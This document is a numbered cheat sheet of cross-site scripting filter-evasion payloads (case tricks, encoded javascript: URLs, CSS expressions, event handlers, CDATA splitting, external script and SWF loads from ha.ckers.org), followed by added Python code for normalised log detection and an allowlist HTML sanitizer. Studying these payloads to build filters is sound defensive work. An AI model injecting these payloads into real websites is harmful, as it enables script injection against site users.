1. Change the character case

<sCript>alert('d')</scRipT>
2. Add extra characters to evade regular-expression checks

<<script>alert('c')//<</script>

<SCRIPT a=">" SRC="t.js"></SCRIPT>

<SCRIPT =">" SRC="t.js"></SCRIPT>

<SCRIPT a=">" '' SRC="t.js"></SCRIPT>

<SCRIPT "a='>'" SRC="t.js"></SCRIPT>

<SCRIPT a=`>` SRC="t.js"></SCRIPT>

<SCRIPT a=">'>" SRC="t.js"></SCRIPT>
3. Use an extension other than .js

<script src="bad.jpg"></script>
4. Put the JavaScript in a CSS file

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

example:

body {
background-image: url('javascript:alert("XSS");')
}
5. Insert other characters into the script tag

<SCRIPT/SRC="t.js"></SCRIPT>

<SCRIPT/anyword SRC="t.js"></SCRIPT>
6. Use a tab or newline to evade

<img src="jav ascr ipt:alert('XSS3')">

<img src="jav ascr ipt:alert('XSS3')">

<IMG SRC="jav ascript:alert('XSS');">

-> tab

-> newline

(The gaps inside "javascript" stand for a tab or a newline character, which the browser discards when it parses the URL, so the scheme is still read as javascript:.)
7. Use "\" to evade

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
8. Use hex encoding to evade (the ";" may also be dropped)

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">
Source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
Source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

(The hex-encoded variants were decoded when this page was rendered, so each one now reads the same as its source line.)
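A detection-side check, added here as an example (it is not part of the original list): a constructed set of access-log lines is scanned twice, once with a raw signature and once after canonicalising each parameter the way a browser would interpret it (percent-decoding, entity decoding, dropping control characters, lowercasing). The case, tab and hex-entity variants from items 1, 6 and 8 are only caught by the second pass, which is the point. The log lines, parameter names and rule patterns are assumptions chosen for the demonstration.

```python
import html
import re
from urllib.parse import parse_qsl, unquote

# Signature written the naive way: exact spelling, case-sensitive, run on the raw value.
RAW_RULE = re.compile(r"<script>|javascript:")

# The same intent expressed against a canonicalised value: any junk may follow the
# tag name (items 2 and 5), and case/whitespace/entity variants are already folded.
NORMALIZED_RULE = re.compile(r"<script\b|javascript:")


def normalize(value: str) -> str:
    """Canonicalise a parameter roughly the way a browser will interpret it.

    Order matters: percent-decoding twice catches double-encoded input, entity
    decoding folds &#x09;-style escapes (item 8) into the real character,
    control characters such as tab and newline (item 6) are then dropped, and
    the result is lowercased (item 1). A literal '%' in benign input may be
    re-decoded by the second unquote; that is acceptable for a detection rule.
    """
    value = unquote(unquote(value))
    value = html.unescape(value)
    value = re.sub(r"[\x00-\x1f\x7f]", "", value)
    return value.lower()


# Constructed access-log lines in Common Log Format (assumption, not from the page).
# Three carry the evasions quoted in items 1, 6 and 8 above; the last one is benign.
CONSTRUCTED_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /search?q=%3CsCript%3Ealert%28%27d%27%29%3C%2FscRipT%3E HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /profile?img=jav%09ascript%3Aalert%28%27XSS3%27%29 HTTP/1.1" 200 77',
    '203.0.113.5 - - [10/Oct/2023:13:55:38 +0000] "GET /profile?img=jav%26%23x09%3Bascript%3Aalert%28%27XSS%27%29 HTTP/1.1" 200 77',
    '198.51.100.7 - - [10/Oct/2023:13:55:39 +0000] "GET /search?q=hello+world HTTP/1.1" 200 1024',
]

REQUEST_TARGET = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def scan(lines=CONSTRUCTED_LOG):
    """Return (parameter, raw_rule_hit, normalized_rule_hit) for every query parameter."""
    findings = []
    for line in lines:
        m = REQUEST_TARGET.search(line)
        if not m:
            continue
        query = m.group(1).partition("?")[2]
        # parse_qsl percent-decodes once, like the application framework would
        for name, value in parse_qsl(query, keep_blank_values=True):
            raw_hit = RAW_RULE.search(value) is not None
            norm_hit = NORMALIZED_RULE.search(normalize(value)) is not None
            findings.append((name, raw_hit, norm_hit))
    return findings


if __name__ == "__main__":
    for name, raw_hit, norm_hit in scan():
        print(f"{name}: raw rule {'HIT' if raw_hit else 'miss'}, "
              f"normalized rule {'HIT' if norm_hit else 'miss'}")
```

Normalising before matching is what makes a signature survive the tricks in this list; the raw rule misses all three hostile lines while the normalised one catches them and still leaves the benign request alone. Matching on the canonical form is still only detection; output encoding and allowlisting at the application are the fix.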
9. Script in HTML tag attributes (event handlers)

<body onload="alert('onload')">

Event handler attributes that can carry it: onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
10. XSS code embedded in an SWF

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
11. Use CDATA to split the XSS code and reassemble it.

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X>
</xml>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
12. Use HTML+TIME.

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert(&quot;XSS&quot;)</SCRIPT>">
</BODY></HTML>
13. Set a cookie via META.

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
14. javascript: in src, href and url()

<IFRAME SRC=javascript:alert('13')></IFRAME>

<img src="javascript:alert('XSS3')">

<IMG DYNSRC="javascript:alert('XSS20')">

<IMG LOWSRC="javascript:alert('XSS21')">

<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

<IFRAME SRC=javascript:alert('XSS27')></IFRAME>

<TABLE BACKGROUND="javascript:alert('XSS29')">

<DIV STYLE="background-image: url(javascript:alert('XSS30'))">

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}</STYLE><A CLASS=XSS></A>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
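The mitigation that makes every item in this list moot is an allowlist sanitizer: instead of trying to recognise the bad spellings, keep only known-safe tags and attributes, and validate URL attributes by the scheme a browser would actually resolve. The following is an added example in Python, not code from the original page; the tag and attribute allowlist, the scheme allowlist and the constructed inputs are assumptions chosen for the demonstration.

```python
import html
import re
from html.parser import HTMLParser

# Allowlist (an assumption for this example): anything not listed is dropped.
# Event handlers (on*), STYLE, DYNSRC, LOWSRC, BACKGROUND and so on are never
# listed, so they never reach the output, whatever their spelling.
ALLOWED_TAGS = {"a", "b", "i", "em", "strong", "p", "div", "span", "br", "img"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
URL_ATTRS = {"href", "src"}
ALLOWED_SCHEMES = {"http", "https", "mailto"}
VOID_TAGS = {"br", "img"}
DROP_WITH_CONTENT = {"script", "style"}  # their text is code, not content

SCHEME = re.compile(r"^([a-zA-Z][a-zA-Z0-9+.\-]*):")


def safe_url(value: str):
    """Return the URL only if a browser would resolve it with an allowlisted (or no) scheme.

    Browsers decode entities in attribute values, discard ASCII tab/LF/CR
    anywhere in a URL and strip leading/trailing C0 controls and spaces before
    reading the scheme case-insensitively. Doing the same here defeats the
    variants in items 1, 6 and 8 without pattern-matching on their spelling.
    """
    url = html.unescape(value)
    url = re.sub(r"[\t\n\r]", "", url)
    url = re.sub(r"^[\x00-\x20]+|[\x00-\x20]+$", "", url)
    m = SCHEME.match(url)
    if m and m.group(1).lower() not in ALLOWED_SCHEMES:
        return None  # javascript:, data:, vbscript: ... are rejected, not "cleaned"
    return url  # relative URLs and allowlisted schemes pass through


class AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._skip = 0  # > 0 while inside <script> or <style>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self._skip += 1
            return
        if self._skip or tag not in ALLOWED_TAGS:
            return  # unknown tag dropped; its text still flows through handle_data
        parts = [tag]
        for name, value in attrs:  # HTMLParser lowercases names and decodes values
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            value = value or ""
            if name in URL_ATTRS:
                value = safe_url(value)
                if value is None:
                    continue
            parts.append(f'{name}="{html.escape(value, quote=True)}"')
        self.out.append("<" + " ".join(parts) + ">")

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self._skip = max(0, self._skip - 1)
            return
        if self._skip or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip:
            self.out.append(html.escape(data, quote=False))  # text is re-encoded on output

    # Comments, <!DOCTYPE>, <?xml:namespace ...> and <![CDATA[ ... ]]> (items 11
    # and 12) fall through to HTMLParser's default no-op handlers and are dropped.


def sanitize(fragment: str) -> str:
    p = AllowlistSanitizer()
    p.feed(fragment)
    p.close()
    return "".join(p.out)


if __name__ == "__main__":
    # Constructed inputs, taken from items 1, 8, 9 and 14 above plus one benign link
    for sample in ["<sCript>alert('d')</scRipT>",
                   "<IMG SRC=\"jav&#x09;ascript:alert('XSS3')\">",
                   "<body onload=\"alert('onload')\">",
                   '<a href="http://example.com/x" onclick="alert(1)">link</a>']:
        print(repr(sample), "->", repr(sanitize(sample)))
```

Two design choices carry the weight: safe_url returns None rather than a rewritten string, so a hostile attribute is dropped instead of partially "fixed", and stripping tab/LF/CR before reading the scheme is what closes items 6 and 8. The per-tag attribute allowlist closes item 9 on its own, since no on* attribute is ever listed, and treating script/style as content-free closes items 4, 7 and the STYLE variants in 14.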